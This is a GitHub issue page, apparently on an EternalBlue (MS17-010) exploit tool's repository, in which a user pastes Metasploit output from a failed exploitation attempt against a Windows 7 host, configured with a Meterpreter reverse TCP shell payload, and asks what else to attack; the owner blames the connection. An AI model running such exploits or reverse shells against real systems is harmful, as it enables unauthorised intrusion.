Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Connection reset by peer, Exp Win7 failed #6

Open
ZhiboWong opened this issue Jan 5, 2023 · 1 comment
Open

Connection reset by peer, Exp Win7 failed #6

ZhiboWong opened this issue Jan 5, 2023 · 1 comment

Comments

@ZhiboWong
Copy link

[] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
RHOST => 10.100.128.93
LHOST => 10.100.130.180
PAYLOAD => windows/x64/meterpreter/reverse_tcp
[-] Handler failed to bind to 10.100.130.180:4444:- -
[
] Started reverse TCP handler on 0.0.0.0:4444
[] 10.100.128.93:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.100.128.93:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[
] 10.100.128.93:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.100.128.93:445 - The target is vulnerable.
[] 10.100.128.93:445 - Connecting to target for exploitation.
[+] 10.100.128.93:445 - Connection established for exploitation.
[+] 10.100.128.93:445 - Target OS selected valid for OS indicated by SMB reply
[
] 10.100.128.93:445 - CORE raw buffer dump (38 bytes)
[] 10.100.128.93:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[
] 10.100.128.93:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[] 10.100.128.93:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 10.100.128.93:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[
] 10.100.128.93:445 - Trying exploit with 12 Groom Allocations.
[] 10.100.128.93:445 - Sending all but last fragment of exploit packet
[-] 10.100.128.93:445 - Errno::ECONNRESET: Connection reset by peer
[
] Exploit completed, but no session was created.

This err is same to ms17_101_eternalblue in msf. I guess rhost have open FW or AV. What can I attack?

@rpranshu
Copy link
Owner

This seems like a peer connection issue, I suggest googling the error, this is not caused by the tool

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants